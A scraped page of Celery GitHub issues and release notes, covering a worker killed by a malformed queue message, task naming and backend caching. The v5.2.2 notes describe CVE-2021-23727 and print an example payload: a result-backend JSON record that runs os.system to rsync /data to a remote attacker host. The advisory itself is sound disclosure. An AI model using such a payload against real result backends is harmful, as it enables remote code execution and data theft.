    logger = get_task_logger(__name__)
    
    @celery.task
    def periodic_task():
        logger.debug('yay')
    
    CELERYBEAT_SCHEDULE = {
        'every-second': {
            'task': 'periodic_task',
            'schedule': timedelta(seconds=1),
        }
    }
    

    The Celery version is 5.2.7; the OS is macOS Ventura 13.0.1.

    Issue Type: Bug Report 
    opened by mxmaslin 4
  • Celery Getting Killed if message in queue is not in Correct format.

    Celery Getting Killed if message in queue is not in Correct format.

    Checklist

    • [x] I have verified that the issue exists against the main branch of Celery.
    • [ ] This has already been asked to the discussions forum first.
    • [ ] I have read the relevant section in the contribution guide on reporting bugs.
    • [ ] I have checked the issues list for similar or identical bug reports.
    • [ ] I have checked the pull requests list for existing proposed fixes.
    • [ ] I have checked the commit log to find out if the bug was already fixed in the main branch.
    • [ ] I have included all related issues and possible duplicate issues in this issue (If there are none, check this box anyway).

    Mandatory Debugging Information

    • [ ] I have included the output of celery -A proj report in the issue. (if you are not able to do this, then at least specify the Celery version affected).
    • [ ] I have verified that the issue exists against the main branch of Celery.
    • [ ] I have included the contents of pip freeze in the issue.
    • [ ] I have included all the versions of all the external dependencies required to reproduce this bug.

    Optional Debugging Information

    • [ ] I have tried reproducing the issue on more than one Python version and/or implementation.
    • [ ] I have tried reproducing the issue on more than one message broker and/or result backend.
    • [ ] I have tried reproducing the issue on more than one version of the message broker and/or result backend.
    • [ ] I have tried reproducing the issue on more than one operating system.
    • [ ] I have tried reproducing the issue on more than one workers pool.
    • [ ] I have tried reproducing the issue with autoscaling, retries, ETA/Countdown & rate limits disabled.
    • [ ] I have tried reproducing the issue after downgrading and/or upgrading Celery and its dependencies.

    Related Issues and Possible Duplicates

    Related Issues

    • None

    Possible Duplicates

    • None

    Environment & Settings

    Celery version:

    celery report Output:

    Steps to Reproduce

    Required Dependencies

    • Minimal Python Version: N/A or Unknown
    • Minimal Celery Version: N/A or Unknown
    • Minimal Kombu Version: N/A or Unknown
    • Minimal Broker Version: N/A or Unknown
    • Minimal Result Backend Version: N/A or Unknown
    • Minimal OS and/or Kernel Version: N/A or Unknown
    • Minimal Broker Client Version: N/A or Unknown
    • Minimal Result Backend Client Version: N/A or Unknown

    Python Packages

    pip freeze Output:

    Other Dependencies

    N/A

    Minimally Reproducible Test Case

    Celery Worker should not get killed

    Celery Worker is getting killed if message is wrong

    A third-party app is putting data into the same Redis queue that Celery uses. If a message is malformed or some attributes are missing, the Celery worker gets killed.

    For example:

    { "body": "gASVPwAAAAAAAACMBmFzZGFzZJSFlH2UfZQojAljYWxsYmFja3OUTowIZXJyYmFja3OUTowFY2hhaW6UTowFY2hvcmSUTnWHlC4=", "content-encoding": "binary", "contentType": "application/x-python-serialize", "headers": { "lang": "py", "task": "caldera_server.tasks.hello_task", "id": "d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5", "shadow": null, "eta": null, "expires": null, "group": null, "group_index": null, "retries": 0, "timelimit": [ null, null ], "root_id": "d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5", "parent_id": null, "argsrepr": "('asdasd',)", "kwargsrepr": "{}", "origin": "[email protected]", "ignore_result": false }, "properties": { "correlation_id": "d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5", "reply_to": "94bdfc39-1575-3f5e-bfed-2b112e16368f", "delivery_mode": 2, "delivery_info": { "exchange": "", "routing_key": "celery" }, "priority": 0, "body_encoding": "base64", "delivery_tag": "782773ea-ca49-4b9d-8f68-1998a03883b9" } }

    Here the key is contentType instead of content-type, which causes the Celery worker to be killed.
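    The failure mode described above can be illustrated with a minimal sketch of a pre-flight check. It only inspects the top-level keys that appear in the example message; the REQUIRED_KEYS tuple and the missing_envelope_keys helper are assumptions made for illustration and are not part of Celery or Kombu.

```python
import json

# Top-level keys taken from the example message above, using the expected
# hyphenated spelling "content-type". This list is an assumption.
REQUIRED_KEYS = ("body", "content-encoding", "content-type", "headers", "properties")


def missing_envelope_keys(raw_message):
    """Return the required top-level keys that are absent from a JSON message."""
    envelope = json.loads(raw_message)
    return [key for key in REQUIRED_KEYS if key not in envelope]


good = json.dumps({
    "body": "",
    "content-encoding": "binary",
    "content-type": "application/x-python-serialize",
    "headers": {},
    "properties": {},
})
# Reproduce the misspelled key from the report.
bad = good.replace('"content-type"', '"contentType"')

print(missing_envelope_keys(good))
print(missing_envelope_keys(bad))
```

    A producer or a small gateway in front of the queue could run a check like this and reject the message before a worker ever sees it.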

    Issue Type: Bug Report 
    opened by pranavdxl 2
  • map and starmap should log a name based on the original task name

    map and starmap should log a name based on the original task name

    Checklist

    • [x] I have checked the issues list for similar or identical enhancement to an existing feature.
    • [x] I have checked the pull requests list for existing proposed enhancements.
    • [ ] I have checked the commit log to find out if the same enhancement was already implemented in the master branch.
    • [ ] I have included all related issues and possible duplicate issues in this issue (If there are none, check this box anyway).

    Related Issues and Possible Duplicates

    Related Issues

    • None

    Possible Duplicates

    • None

    Brief Summary

    If I use task.chunks(...).group() etc. to run tasks, all I see in the logs will be "celery.starmap" and the information about the original task name is completely lost.

    I'd like to see, for example, a task name derived from the original one, such as: original_task_name.starmap.

    Design

    It might be possible to turn the _task_name class attribute into a class property.

    Architectural Considerations

    I don't know if this might break other parts of celery.

    None

    Proposed Behavior

    I'd like to see, for example, a task name derived from the original one, such as: original_task_name.starmap.

    Proposed UI/UX

    No change.

    Diagrams

    N/A

    Alternatives

    1. Currently one alternative seems to be to override methods and classes in multiple places, see https://gitter.im/celery/celery?at=639b204db9b687534196b04f which is cumbersome, so a direct change in celery core seems cleaner.

    2. Maybe a method on the Task and/or Signature classes that can be overridden? That one could trivially return celery.starmap for now in order to remain compatible with existing installations.
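    The second alternative could look roughly like the sketch below. Everything in it is hypothetical: Signature is a simplified stand-in rather than Celery's class, and the StarmapNaming hook and its log_name method do not exist in Celery. The point is only that the default keeps returning celery.starmap while a subclass can derive the name from the original task.

```python
class Signature:
    """Simplified stand-in for a task signature (not Celery's class)."""

    def __init__(self, task_name):
        self.task_name = task_name


class StarmapNaming:
    """Hypothetical hook that decides which name a starmap call logs."""

    def log_name(self, signature):
        # Default keeps the current behaviour, so existing installations
        # would see no change.
        return "celery.starmap"


class DerivedStarmapNaming(StarmapNaming):
    """Override that derives the logged name from the wrapped task."""

    def log_name(self, signature):
        return f"{signature.task_name}.starmap"


sig = Signature("proj.tasks.add")
print(StarmapNaming().log_name(sig))
print(DerivedStarmapNaming().log_name(sig))
```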

    Issue Type: Enhancement 
    opened by TauPan 1
  • Switch between thread & global for app.backend

    Switch between thread & global for app.backend

    Note: Before submitting this pull request, please review our contributing guidelines.

    Description

    For app.backend, switch between self._local and self._global as the cache, depending on whether the environment is fully thread-safe (e.g. eventlet) and whether the backend is thread-safe (e.g. Redis).
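    A minimal sketch of the idea, not the code in this pull request: App is a simplified stand-in for the Celery app, the constructor flags are hypothetical, and the rule "share one backend only when both the environment and the backend are thread-safe" is an assumption about how the two conditions combine.

```python
import threading


class App:
    """Simplified stand-in for the app object (not Celery's class)."""

    def __init__(self, make_backend, env_thread_safe, backend_thread_safe):
        self._make_backend = make_backend
        # Assumption: a shared instance is used only if both flags are true.
        self._share = env_thread_safe and backend_thread_safe
        self._local = threading.local()  # cache holding one backend per thread
        self._global = None              # cache holding one backend for all threads
        self._lock = threading.Lock()

    @property
    def backend(self):
        if self._share:
            with self._lock:
                if self._global is None:
                    self._global = self._make_backend()
                return self._global
        try:
            return self._local.backend
        except AttributeError:
            self._local.backend = self._make_backend()
            return self._local.backend


def backend_seen_in_thread(app):
    """Return the backend object that a freshly started thread observes."""
    seen = []
    worker = threading.Thread(target=lambda: seen.append(app.backend))
    worker.start()
    worker.join()
    return seen[0]


shared = App(object, env_thread_safe=True, backend_thread_safe=True)
per_thread = App(object, env_thread_safe=True, backend_thread_safe=False)
print(shared.backend is backend_seen_in_thread(shared))
print(per_thread.backend is backend_seen_in_thread(per_thread))
```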

    Fixes:

    • #7960
    • #6819
    opened by chenseanxy 11
Releases(v5.3.0b1)
  • v5.3.0b1(Aug 1, 2022)

    Release date: 2022-08-01 5:15 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Canvas Header Stamping (#7384).
    • async chords should pass its kwargs to the group/body.
    • beat: Suppress banner output with the quiet option (#7608).
    • Fix honor Django's TIME_ZONE setting.
    • Don't warn about DEBUG=True for Django.
    • Fixed the on_after_finalize cannot access tasks due to deadlock.
    • Bump kombu>=5.3.0b1,<6.0.
    • Make default worker state limits configurable (#7609).
    • Only clear the cache if there are no active writers.
    • Billiard 4.0.1
  • v5.3.0a1(Jun 29, 2022)

    Release date: 2022-06-29 5:15 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Remove Python 3.4 compatibility code.
    • call ping to set connection attr for avoiding redis parse_response error.
    • Use importlib instead of deprecated pkg_resources.
    • fix #7245 uid duplicated in command params.
    • Fix subscribed_to maybe empty (#7232).
    • Fix: Celery beat sleeps 300 seconds sometimes even when it should run a task within a few seconds (e.g. 13 seconds) #7290.
    • Add security_key_password option (#7292).
    • Limit elasticsearch support to below version 8.0.
    • try new major release of pytest 7 (#7330).
    • broker_connection_retry should no longer apply on startup (#7300).
    • Remove __ne__ methods (#7257).
    • fix #7200 uid and gid.
    • Remove exception-throwing from the signal handler.
    • Add mypy to the pipeline (#7383).
    • Expose more debugging information when receiving unknown tasks. (#7405)
    • Avoid importing buf_t from billiard's compat module as it was removed.
    • Avoid negating a constant in a loop. (#7443)
    • Ensure expiration is of float type when migrating tasks (#7385).
    • load_extension_class_names - correct module_name (#7406)
    • Bump pymongo[srv]>=4.0.2.
    • Use inspect.getgeneratorstate in asynpool.gen_not_started (#7476).
    • Fix test with missing .get() (#7479).
    • azure-storage-blob>=12.11.0
    • Make start_worker, setup_default_app reusable outside of pytest.
    • Ensure a proper error message is raised when id for key is empty (#7447).
    • Crontab string representation does not match UNIX crontab expression.
    • Worker should exit with ctx.exit to get the right exitcode for non-zero.
    • Fix expiration check (#7552).
    • Use callable built-in.
    • Include dont_autoretry_for option in tasks. (#7556)
    • fix: Syntax error in arango query.
    • Fix custom headers propagation on task retries (#7555).
    • Silence backend warning when eager results are stored.
    • Reduce prefetch count on restart and gradually restore it (#7350).
    • Improve workflow primitive subclassing (#7593).
    • test kombu>=5.3.0a1,<6.0 (#7598).
    • Canvas Header Stamping (#7384).
  • v5.2.7(May 29, 2022)

    Release date: 2022-5-26 12:15 P.M UTC+2:00

    Release by: Omer Katz

    • Fix packaging issue which causes poetry 1.2b1 and above to fail install Celery (#7534).
  • v5.2.6(Apr 5, 2022)

    Release date: 2022-4-04 21:15 P.M UTC+2:00

    Release by: Omer Katz

    • load_extension_class_names - correct module_name (#7433).

      This fixes a regression caused by #7218.
    
  • v5.2.5(Apr 3, 2022)

    Release date: 2022-4-03 20:42 P.M UTC+2:00

    Release by: Omer Katz

    This release was yanked due to a regression caused by the PR below

    • Use importlib instead of deprecated pkg_resources (#7218).
  • v5.2.4(Apr 3, 2022)

  • v5.2.3(Dec 29, 2021)

    Release date: 2021-12-29 12:00 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Allow redis >= 4.0.2.
    • Upgrade minimum required pymongo version to 3.11.1.
    • tested pypy3.8 beta (#6998).
    • Split Signature.__or__ into subclasses' __or__ (#7135).
    • Prevent duplication in event loop on Consumer restart.
    • Restrict setuptools>=59.1.1,<59.7.0.
    • Kombu bumped to v5.2.3
    • py-amqp bumped to v5.0.9
    • Some docs & CI improvements.
  • v5.2.2(Dec 26, 2021)

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error in the process that queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend, with os as the exception module, the system function as the exception type, and the payload rsync /data [email protected]:~/data as the exception arguments, like so:

      {
            "exc_module": "os",
            "exc_type": "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
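      The condition described above can be sketched as follows. This is an illustration under stated assumptions, not the actual patch: rebuild_exception is a hypothetical helper, and it simply refuses to call anything that is not a class derived from BaseException.

```python
import importlib


def rebuild_exception(exc_module, exc_type, exc_message):
    """Recreate a stored exception, refusing anything that is not an exception class."""
    module = importlib.import_module(exc_module)
    cls = getattr(module, exc_type)
    # The guard: only classes derived from BaseException may be called.
    if not (isinstance(cls, type) and issubclass(cls, BaseException)):
        raise TypeError(f"{exc_module}.{exc_type} is not an exception class")
    return cls(exc_message)


# A genuine exception type is rebuilt as usual.
print(repr(rebuild_exception("builtins", "ValueError", "boom")))

# The os.system payload is rejected before it can be called.
try:
    rebuild_exception("os", "system", "echo unsafe")
except TypeError as err:
    print(err)
```

      Without the guard, the final line of rebuild_exception would call os.system with the attacker's string as its argument.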

  • v5.2.1(Nov 16, 2021)

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
    • Remove dependency to case (#7077).
    • fix: task expiration is timezone aware if needed (#7065).
    • Initial testing of pypy-3.8 beta to CI.
    • Docs, CI & tests cleanups.
  • v5.2.0(Nov 8, 2021)

    Release date: 2021-11-08 7.15 A.M UTC+6:00

    Release by: Asif Saif Uddin

    • Prevent from subscribing to empty channels (#7040)
    • fix register_task method.
    • Fire task failure signal on final reject (#6980)
    • Limit pymongo version: <3.12.1 (#7041)
    • Bump min kombu version to 5.2.1
  • v5.2.0rc2(Nov 5, 2021)

    Release date: 2021-11-02 1.54 P.M UTC+3:00

    Release by: Naomi Elstein

    • Bump Python 3.10.0 to rc2.
    • [pre-commit.ci] pre-commit autoupdate (#6972).
    • autopep8.
    • Prevent worker to send expired revoked items upon hello command (#6975).
    • docs: clarify the 'keeping results' section (#6979).
    • Update deprecated task module removal in 5.0 documentation (#6981).
    • [pre-commit.ci] pre-commit autoupdate.
    • try python 3.10 GA.
    • mention python 3.10 on readme.
    • Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
    • Azure blockblob backend parametrized connection/read timeouts (#6978).
    • Add as_uri method to azure block blob backend.
    • Add possibility to override backend implementation with celeryconfig (#6879).
    • [pre-commit.ci] pre-commit autoupdate.
    • try to fix deprecation warning.
    • [pre-commit.ci] pre-commit autoupdate.
    • not needed anymore.
    • not needed anymore.
    • not used anymore.
    • add github discussions forum
  • v5.2.0rc1(Sep 27, 2021)

    Release date: 2021-09-26 4.04 P.M UTC+3:00

    Release by: Omer Katz

    • Kill all workers when main process exits in prefork model (#6942).
    • test kombu 5.2.0rc1 (#6947).
    • try moto 2.2.x (#6948).
    • Prepared Hacker News Post on Release Action.
    • update setup with python 3.7 as minimum.
    • update kombu on setupcfg.
    • Added note about automatic killing all child processes of worker after its termination.
    • [pre-commit.ci] pre-commit autoupdate.
    • Move importskip before greenlet import (#6956).
    • amqp: send expiration field to broker if requested by user (#6957).
    • Single line drift warning.
    • canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
    • Allow to enable Events with app.conf mechanism.
    • Warn when expiration date is in the past.
    • Add the Framework :: Celery trove classifier.
    • Give indication whether the task is replacing another (#6916).
    • Make setup.py executable.
    • Bump version: 5.2.0b3 → 5.2.0rc1.
  • v5.2.0b3(Sep 4, 2021)

    Release date: 2021-09-02 8.38 P.M UTC+3:00

    Release by: Omer Katz

    • Add args to LOG_RECEIVED (fixes #6885) (#6898).
    • Terminate job implementation for eventlet concurrency backend (#6917).
    • Add cleanup implementation to filesystem backend (#6919).
    • [pre-commit.ci] pre-commit autoupdate (#69).
    • Add before_start hook (fixes #4110) (#6923).
    • Restart consumer if connection drops (#6930).
    • Remove outdated optimization documentation (#6933).
    • added https verification check functionality in arangodb backend (#6800).
    • Drop Python 3.6 support.
    • update supported python versions on readme.
    • [pre-commit.ci] pre-commit autoupdate (#6935).
    • Remove appveyor configuration since we migrated to GA.
    • pyupgrade is now set to upgrade code to 3.7.
    • Drop exclude statement since we no longer test with pypy-3.6.
    • 3.10 is not GA so it's not supported yet.
    • Celery 5.1 or earlier support Python 3.6.
    • Fix linting error.
    • fix: Pass a Context when chaining fail results (#6899).
    • Bump version: 5.2.0b2 → 5.2.0b3.
  • v5.2.0b2(Sep 1, 2021)

    Release date: 2021-08-17 5.35 P.M UTC+3:00

    Release by: Omer Katz

    • Test windows on py3.10rc1 and pypy3.7 (#6868).
    • Route chord_unlock task to the same queue as chord body (#6896).
    • Add message properties to app.tasks.Context (#6818).
    • handle already converted LogLevel and JSON (#6915).
    • 5.2 is codenamed dawn-chorus.
    • Bump version: 5.2.0b1 → 5.2.0b2.
  • v5.2.0b1(Aug 11, 2021)

    Release date: 2021-08-11 5.42 P.M UTC+3:00

    Release by: Omer Katz

    • Add Python 3.10 support (#6807).
    • Fix docstring for Signal.send to match code (#6835).
    • No blank line in log output (#6838).
    • Chords get body_type independently to handle cases where body.type does not exist (#6847).
    • Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
    • Fix multithreaded backend usage (#6851).
    • Fix Open Collective donate button (#6848).
    • Fix setting worker concurrency option after signal (#6853).
    • Make ResultSet.on_ready promise hold a weakref to self (#6784).
    • Update configuration.rst.
    • Discard jobs on flush if synack isn't enabled (#6863).
    • Bump click version to 8.0 (#6861).
    • Amend IRC network link to Libera (#6837).
    • Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
    • Fix inspect --json output to return valid json without --quiet.
    • Remove celery.task references in modules, docs (#6869).
    • The Consul backend must correctly associate requests and responses (#6823).
  • v5.1.2(Jul 12, 2021)

    Release date: 2021-06-28 16.15 P.M UTC+3:00

    Release by: Omer Katz

    • When chords fail, correctly call errbacks. (#6814)

      We had a special case for calling errbacks when a chord failed which assumed they were old style. This change ensures that we call the proper errback dispatch method which understands new and old style errbacks, and adds test to confirm that things behave as one might expect now.

    • Avoid using the Event.isSet() deprecated alias. (#6824)

    • Reintroduce sys.argv default behaviour for Celery.start(). (#6825)

  • v5.1.1(Jun 18, 2021)

    Release date: 2021-06-17 16.10 P.M UTC+3:00

    Release by: Omer Katz

    • Fix --pool=threads support in command line options parsing. (#6787)

    • Fix LoggingProxy.write() return type. (#6791)

    • Couchdb key is now always coerced into a string. (#6781)

    • grp is no longer imported unconditionally. (#6804)

      This fixes a regression in 5.1.0 when running Celery in non-unix systems.
    
    • Ensure regen utility class gets marked as done when concretised. (#6789)

    • Preserve call/errbacks of replaced tasks. (#6770)

    • Use single-lookahead for regen consumption. (#6799)

    • Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)

  • v5.1.0(May 26, 2021)

    Release date: 2021-05-23 19.20 P.M UTC+3:00

    Release by: Omer Katz

    • celery -A app events -c camera now works as expected. (#6774)
    • Bump minimum required Kombu version to 5.1.0.
  • v5.1.0rc1(May 19, 2021)

    Release date: 2021-05-02 16.06 P.M UTC+3:00

    Release by: Omer Katz

    • Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
    • Error propagation and errback calling for group-like signatures now works as expected. (#6746)
    • Fix sanitization of passwords in sentinel URIs. (#6765)
    • Add LOG_RECEIVED to customize logging. (#6758)
  • v5.1.0b2(May 2, 2021)

    Release date: 2021-05-02 16.06 P.M UTC+3:00

    Release by: Omer Katz

    • Fix the behavior of our json serialization which regressed in 5.0. (#6561)
    • Add support for SQLAlchemy 1.4. (#6709)
    • Safeguard against schedule entry without kwargs. (#6619)
    • task.apply_async(ignore_result=True) now avoids persisting the results. (#6713)
    • Update systemd tmpfiles path. (#6688)
    • Ensure AMQPContext exposes an app attribute. (#6741)
    • Inspect commands accept arguments again (#6710).
    • Chord counting of group children is now accurate. (#6733)
    • Add a setting worker_cancel_long_running_tasks_on_connection_loss to terminate tasks with late acknowledgement on connection loss. (#6654)
    • The task-revoked event and the task_revoked signal are not duplicated when Request.on_failure is called. (#6654)
    • Restore pickling support for Retry. (#6748)
    • Add support in the redis result backend for authenticating with a username. (#6750)
    • The worker_pool setting is now respected correctly. (#6711)
  • v5.1.0b1(Apr 2, 2021)

    Release date: 2021-04-02 10.25 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Add sentinel_kwargs to Redis Sentinel docs.
    • Depend on the maintained python-consul2 library. (#6544).
    • Use result_chord_join_timeout instead of hardcoded default value.
    • Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
    • Improved integration tests.
    • pass_context for handle_preload_options decorator (#6583).
    • Makes regen less greedy (#6589).
    • Pytest worker shutdown timeout (#6588).
    • Exit celery with non zero exit value if failing (#6602).
    • Raise BackendStoreError when set value is too large for Redis.
    • Trace task optimizations are now set via Celery app instance.
    • Make trace_task_ret and fast_trace_task public.
    • reset_worker_optimizations and create_request_cls has now app as optional parameter.
    • Small refactor in exception handling of on_failure (#6633).
    • Fix for issue #5030 "Celery Result backend on Windows OS".
    • Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
    • Allow heartbeats to be sent in tests (#6632).
    • Fixed default visibility timeout note in sqs documentation.
    • Support Redis Sentinel with SSL.
    • Simulate more exhaustive delivery info in apply().
    • Start chord header tasks as soon as possible (#6576).
    • Forward shadow option for retried tasks (#6655).
    • --quiet flag now actually makes celery avoid producing logs (#6599).
    • Update platforms.py "superuser privileges" check (#6600).
    • Remove unused property autoregister from the Task class (#6624).
    • fnmatch.translate() already translates globs for us. (#6668).
    • Upgrade some syntax to Python 3.6+.
    • Add azureblockblob_base_path config (#6669).
    • Fix checking expiration of X.509 certificates (#6678).
    • Drop the lzma extra.
    • Fix JSON decoding errors when using MongoDB as backend (#6675).
    • Allow configuration of RedisBackend's health_check_interval (#6666).
    • Safeguard against schedule entry without kwargs (#6619).
    • Docs only - SQS broker - add STS support (#6693) through kombu.
    • Drop fun_accepts_kwargs backport.
    • Tasks can now have required kwargs at any order (#6699).
    • Min py-amqp 5.0.6.
    • min billiard is now 3.6.4.0.
    • Minimum kombu is now 5.1.0b1.
    • Numerous docs fixes.
    • Moved CI to github action.
    • Updated deployment scripts.
    • Updated docker.
    • Initial support of python 3.9 added.
  • v4.4.7(Jul 31, 2020)

    4.4.7

    Release date: 2020-07-31 11.45 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Add task_received, task_rejected and task_unknown to signals module.
    • [ES backend] add 401 as safe for retry.
    • treat internal errors as failure.
    • Remove redis fanout caveats.
    • FIX: -A and --args should behave the same. (#6223)
    • Class-based tasks autoretry (#6233)
    • Preserve order of group results with Redis result backend (#6218)
    • Replace future with celery.five Fixes #6250, and reraise to include
    • Fix REMAP_SIGTERM=SIGQUIT not working
    • (Fixes #6258) MongoDB: fix for serialization issue (#6259)
    • Make use of ordered sets in Redis opt-in
    • Test, CI, Docker, style and minor doc improvements.
  • v4.4.5(Jun 8, 2020)

Owner
Celery
Distributed Programming framework for Python.
Celery
Asynchronous serverless task queue with timed leasing of tasks

Asynchronous serverless task queue with timed leasing of tasks. Threaded implementations for SQS and local filesystem.

24 Dec 14, 2022
Asynchronous tasks in Python with Celery + RabbitMQ + Redis

python-asynchronous-tasks Setup & Installation Create a virtual environment and install the dependencies: $ python -m venv venv $ source env/bin/activ

Valon Januzaj 40 Dec 03, 2022
Dagon - An Asynchronous Task Graph Execution Engine

Dagon - An Asynchronous Task Graph Execution Engine Dagon is a job execution sys

8 Nov 17, 2022
Sync Laravel queue with Python. Provides an interface for communication between Laravel and Python.

Python Laravel Queue Queue sync between Python and Laravel using Redis driver. You can process jobs dispatched from Laravel in Python. NOTE: This pack

Sinan Bekar 3 Oct 01, 2022
Queuing with django celery and rabbitmq

queuing-with-django-celery-and-rabbitmq Install Python 3.6 or above sudo apt-get install python3.6 Install RabbitMQ sudo apt-get install rabbitmq-ser

1 Dec 22, 2021
Pyramid configuration with celery integration. Allows you to use pyramid .ini files to configure celery and have your pyramid configuration inside celery tasks.

Getting Started Include pyramid_celery either by setting your includes in your .ini, or by calling config.include('pyramid_celery'): pyramid.includes

John Anderson 102 Dec 02, 2022
Add you own metrics to your celery backend

Add you own metrics to your celery backend

Gandi 1 Dec 16, 2022
PostgreSQL-based Task Queue for Python

Procrastinate: PostgreSQL-based Task Queue for Python Procrastinate is an open-source Python 3.7+ distributed task processing library, leveraging Post

Procrastinate 486 Jan 08, 2023
Py_extract is a simple, light-weight python library to handle some extraction tasks using less lines of code

py_extract Py_extract is a simple, light-weight python library to handle some extraction tasks using less lines of code. Still in Development Stage! I

I'm Not A Bot #Left_TG 7 Nov 07, 2021
FastAPI with Celery

Minimal example utilizing fastapi and celery with RabbitMQ for task queue, Redis for celery backend and flower for monitoring the celery tasks.

Grega Vrbančič 371 Jan 01, 2023
Django database backed celery periodic task scheduler with support for task dependency graph

Djag Scheduler (Dj)ango Task D(AG) (Scheduler) Overview Djag scheduler associates scheduling information with celery tasks The task schedule is persis

Mohith Reddy 3 Nov 25, 2022
A multiprocessing distributed task queue for Django

A multiprocessing distributed task queue for Django Features Multiprocessing worker pool Asynchronous tasks Scheduled, cron and repeated tasks Signed

Ilan Steemers 1.7k Jan 03, 2023
Mr. Queue - A distributed worker task queue in Python using Redis & gevent

MRQ MRQ is a distributed task queue for python built on top of mongo, redis and gevent. Full documentation is available on readthedocs Why? MRQ is an

Pricing Assistant 871 Dec 25, 2022
Distributed Task Queue (development branch)

Version: 5.1.0b1 (singularity) Web: https://docs.celeryproject.org/en/stable/index.html Download: https://pypi.org/project/celery/ Source: https://git

Celery 20.7k Jan 01, 2023
Flower is a web based tool for monitoring and administrating Celery clusters.

Real-time monitor and web admin for Celery distributed task queue

Mher Movsisyan 5.5k Jan 02, 2023
A fully-featured e-commerce application powered by Django

kobbyshop - Django Ecommerce App A fully featured e-commerce application powered by Django. Sections Project Description Features Technology Setup Scr

Kwabena Yeboah 2 Feb 15, 2022
A fast and reliable background task processing library for Python 3.

dramatiq A fast and reliable distributed task processing library for Python 3. Changelog: https://dramatiq.io/changelog.html Community: https://groups

Bogdan Popa 3.4k Jan 01, 2023
Redis-backed message queue implementation that can hook into a discord bot written with hikari-lightbulb.

Redis-backed FIFO message queue implementation that can hook into a discord bot written with hikari-lightbulb. This is eventually intended to be the backend communication between a bot and a web dash

thomm.o 7 Dec 05, 2022
A Django app that integrates with Dramatiq.

django_dramatiq django_dramatiq is a Django app that integrates with Dramatiq. Requirements Django 1.11+ Dramatiq 0.18+ Example You can find an exampl

Bogdan Popa 261 Dec 25, 2022
Beatserver, a periodic task scheduler for Django 🎵

Beat Server Beatserver, a periodic task scheduler for django channels | beta software How to install Prerequirements: Follow django channels documenta

Raja Simon 130 Dec 17, 2022